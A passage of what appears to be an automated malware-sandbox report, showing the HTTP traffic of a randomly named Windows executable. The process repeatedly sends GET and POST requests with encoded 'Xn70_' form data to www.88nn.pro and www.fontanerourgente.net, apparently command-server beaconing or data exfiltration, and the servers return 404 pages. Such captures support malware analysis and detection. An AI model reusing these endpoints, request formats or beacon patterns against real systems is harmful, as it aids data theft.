WxRAmnt3LKaWKXEZsBjYUusVqZv9UJWK97TQhWPeVuzIY8qLCSzySs8WbzhQs094T9qRIe+hTLqK/GJOndSZLOeZL4vchWvqE83efrTpZD7H/wkKIskMAoVUeZ [TRUNCATED]
                      Aug 23, 2024 08:26:15.381623983 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:15 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.64972445.157.69.194806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:17.077794075 CEST499OUTGET /l4rw/?Xn70_=ZXNQqBP58JXIf3ltP6wut8CCjedJLF5l9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj4J8VLwdTZn5p64yovrdSdmFXVLBYTbU+6U99coUT9vxRPQh+Kno=&mV=ZpN4DLSXOzy8qX HTTP/1.1
                      Host: www.88nn.pro
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Aug 23, 2024 08:26:17.917974949 CEST302INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Fri, 23 Aug 2024 06:26:17 GMT
                      Content-Type: text/html
                      Content-Length: 138
                      Connection: close
                      ETag: "667cd175-8a"
                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.64972537.187.158.211806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:23.010622978 CEST778OUTPOST /t3gh/ HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.fontanerourgente.net
                      Referer: http://www.fontanerourgente.net/t3gh/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 210
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 30 4b 6b 38 44 48 30 37 2f 4e 63 47 39 77 71 6b 68 34 52 42 70 65 79 62 39 64 79 35 6e 4d 41 74 50 39 45 4d 51 49 2b 6f 2b 53 41
                      Data Ascii: Xn70_=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlu0Kk8DH07/NcG9wqkh4RBpeyb9dy5nMAtP9EMQI+o+SA
                      Aug 23, 2024 08:26:23.852689028 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:23 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                      Aug 23, 2024 08:26:23.852710009 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                      Aug 23, 2024 08:26:23.852720976 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                      Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                      Aug 23, 2024 08:26:23.852730989 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                      Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                      Aug 23, 2024 08:26:23.852742910 CEST1236INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                      Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                      Aug 23, 2024 08:26:23.852752924 CEST1236INData Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                      Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                      Aug 23, 2024 08:26:23.852765083 CEST1236INData Raw: 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                      Data Ascii: nline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file
                      Aug 23, 2024 08:26:23.852777004 CEST1236INData Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 67 72 65 65 6e 3a 20 23 44 31 45 34 44 44 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 75 65 3a 20 23 44 31 44 46 45 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                      Data Ascii: wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE4;--wp--preset--color--purple: #D1D1E4;--wp--preset--color--red: #E4D1D1;--wp--preset--color--orange: #E4DAD1;--wp--preset--color--yellow: #EEEADD;--wp--preset--gradient--vivid
                      Aug 23, 2024 08:26:23.852787971 CEST1236INData Raw: 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c
                      Data Ascii: 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%
                      Aug 23, 2024 08:26:23.852798939 CEST1236INData Raw: 6d 61 6c 6c 3a 20 31 38 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 32
                      Data Ascii: mall: 18px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 24px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--extra-small: 16px;--wp--preset--font-size--normal: 20px;--wp--preset--font-size--extra-large:
                      Aug 23, 2024 08:26:23.861167908 CEST1211INData Raw: 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d 70 6c 61 74
                      Data Ascii: ;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.h


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.64972637.187.158.211806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:25.558609962 CEST802OUTPOST /t3gh/ HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.fontanerourgente.net
                      Referer: http://www.fontanerourgente.net/t3gh/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 234
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                      Data Raw: 58 6e 37 30 5f 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6e 47 6a 6c 6b 67 38 77 30 2b 54 6f 4c 35 69 62 6f 51 63 54 61 38 6a 65 53 4a 39 67 6d 78 42 54 4d 52 55 50 62 54 45 4a 65 4c 72 69 33 69 74 78 58 79 30 73 73 4b 2f 75 6c 2f 33 31 43 55 65 32 62 4c 52 4b 52 4a 70 6f 72 43 56 31 79 53 44 71 37 34 6e 66 74 6d 5a 2f 70 62 6c 78 79 4a 6a 72 76 61 72 46 59 4c 32 63 57 61 34 49 6c 4b 71 57 48 54 50 52 4a 73 58 30 52 4a 58 35 42 5a 6c 79 6c 35 50 42 35 6e 4f 46 4e 39 6b 59 37 64 70 63 6b 47 7a 64 72 30 66 6c 38 6c 4c 73 76 38 42 64 4f 72 78 77 34 53 34 79 54 35 2b 77 62 2f 46 41 35 48 4d 71 76 50 46 45 65 48 45 5a 6e 4b 33 6a 78 62 4c 45 37 61 4b 57 53 37 64 68 66 2f 4b 73 56 43 45 31 54 51 3d 3d
                      Data Ascii: Xn70_=Q9wnYURzxwjnnGjlkg8w0+ToL5iboQcTa8jeSJ9gmxBTMRUPbTEJeLri3itxXy0ssK/ul/31CUe2bLRKRJporCV1ySDq74nftmZ/pblxyJjrvarFYL2cWa4IlKqWHTPRJsX0RJX5BZlyl5PB5nOFN9kY7dpckGzdr0fl8lLsv8BdOrxw4S4yT5+wb/FA5HMqvPFEeHEZnK3jxbLE7aKWS7dhf/KsVCE1TQ==
                      Aug 23, 2024 08:26:26.440879107 CEST1236INHTTP/1.1 404 Not Found
                      Date: Fri, 23 Aug 2024 06:26:26 GMT
                      Server: Apache
                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                      Cache-Control: no-cache, must-revalidate, max-age=0
                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                      Connection: close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                      Aug 23, 2024 08:26:26.440943956 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                      Aug 23, 2024 08:26:26.440954924 CEST1236INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                      Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                      Aug 23, 2024 08:26:26.440965891 CEST1236INData Raw: 28 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e
                      Data Ascii: (n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return
                      Aug 23, 2024 08:26:26.440974951 CEST1236INData Raw: 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 3b 70 61 64 64 69 6e 67 3a 2e 38 65 6d 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 65 6d 62
                      Data Ascii: ius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed :where(figcaption){color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed :where(figcaption){color:#ffffffa6}.wp-block-embed{margin:0 0 1e
                      Aug 23, 2024 08:26:26.440985918 CEST1236INData Raw: 73 74 79 6c 65 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d
                      Data Ascii: style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}
                      Aug 23, 2024 08:26:26.440999031 CEST1236INData Raw: 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62
                      Data Ascii: nline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file
                      Aug 23, 2024 08:26:26.441009998 CEST1236INData Raw: 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 67 72 65 65 6e 3a 20 23 44 31 45 34 44 44 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 75 65 3a 20 23 44 31 44 46 45 34 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                      Data Ascii: wp--preset--color--green: #D1E4DD;--wp--preset--color--blue: #D1DFE4;--wp--preset--color--purple: #D1D1E4;--wp--preset--color--red: #E4D1D1;--wp--preset--color--orange: #E4DAD1;--wp--preset--color--yellow: #EEEADD;--wp--preset--gradient--vivid
                      Aug 23, 2024 08:26:26.441020012 CEST1224INData Raw: 30 25 2c 72 67 62 28 32 35 34 2c 34 35 2c 34 35 29 20 35 30 25 2c 72 67 62 28 31 30 37 2c 30 2c 36 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 64 75 73 6b 3a 20 6c
                      Data Ascii: 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%
                      Aug 23, 2024 08:26:26.441039085 CEST1236INData Raw: 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 38 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69
                      Data Ascii: font-size--small: 18px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 24px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-size--extra-small: 16px;--wp--preset--font-size--normal: 20px;--wp--preset--font-size--
                      Aug 23, 2024 08:26:26.445990086 CEST1236INData Raw: 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d
                      Data Ascii: ex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !i


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.64972737.187.158.211806008C:\Program Files (x86)\ILWkaPetWEWvsHqQeuqLuqkjcoNemjdtBIFUkxHiurSHEgoGdFKHKZmSllAsOClRyqQWoEsJmKE\GQXHQykfhUHHi.exe
                      TimestampBytes transferredDirectionData
                      Aug 23, 2024 08:26:28.111567020 CEST1815OUTPOST /t3gh/ HTTP/1.1
                      Host: www.fontanerourgente.net
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en;q=0.5
                      Accept-Encoding: gzip, deflate
                      Origin: http://www.fontanerourgente.net
                      Referer: http://www.fontanerourgente.net/t3gh/
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Length: 1246
                      Content-Type: application/x-www-form-urlencoded
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
